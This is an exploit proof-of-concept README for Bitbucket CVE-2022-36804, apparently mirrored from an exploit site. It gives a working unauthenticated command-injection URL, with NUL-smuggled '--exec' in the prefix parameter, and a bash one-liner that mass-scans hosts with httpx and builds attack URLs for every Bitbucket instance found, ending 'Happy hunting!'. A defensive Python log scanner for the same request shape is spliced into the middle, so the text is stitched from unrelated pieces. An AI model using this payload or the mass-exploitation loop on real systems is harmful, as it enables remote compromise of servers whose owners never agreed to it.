## https://sploitus.com/exploit?id=CCB6354A-0595-55E1-8DF9-BEF3891E6947
# CVE-2022-36804-POC 🕷️
Bitbucket CVE-2022-36804 unauthenticated remote command execution

## Exploitation

Find publicly visible repositories: `example.com/repos?visibility=public`

`/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin`
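For defenders, an added example (not part of this PoC) that scans web-server access logs for the request shape above: a Bitbucket archive endpoint whose query carries a percent-encoded NUL (`%00`) followed by a git-style `--option`. The combined-log format and the `/projects/{key}/repos/{slug}/archive` path shape are assumptions (the latter matches what the mass-exploitation one-liner builds); the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic), combined-log shape.
# Line 1: the crafted archive request; line 2: a normal archive download;
# line 3: repository listing; line 4: a literal "--" with no NUL (must not match).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2022:10:00:01 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?filename=x&at=x&path=x&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 200 512
10.0.0.6 - - [01/Sep/2022:10:00:02 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip&at=refs/heads/main HTTP/1.1" 200 80345
10.0.0.7 - - [01/Sep/2022:10:00:03 +0000] "GET /repos?visibility=public HTTP/1.1" 200 2048
10.0.0.8 - - [01/Sep/2022:10:00:04 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=my--branch HTTP/1.1" 200 4096
"""

# Assumed path shape of the archive endpoint (REST version "latest" or "1.0"-style).
ARCHIVE_PATH = re.compile(r"^/rest/api/(?:latest|\d+\.\d+)/projects/[^/]+/repos/[^/]+/archive$")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A NUL byte immediately followed by a "--flag" is the injection signature.
NUL_FLAG_RE = re.compile(r"\x00--[a-z-]+")


def archive_injection_findings(log_text):
    """Return (client_ip, parameter, decoded value) for every archive request whose
    query string smuggles a NUL-separated --option in any parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not ARCHIVE_PATH.match(parts.path):
            continue
        # parse_qs percent-decodes values, so %00 becomes a real NUL character here.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if NUL_FLAG_RE.search(value):
                    findings.append((line.split()[0], name, value))
    return findings


if __name__ == "__main__":
    for ip, param, value in archive_injection_findings(SAMPLE_LOG):
        print(f"{ip} param={param!r} value={value!r}")
```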


## Mass Exploitation
```bash
for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done
```

Visit crafted URLs :)

Happy hunting! 🍺

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)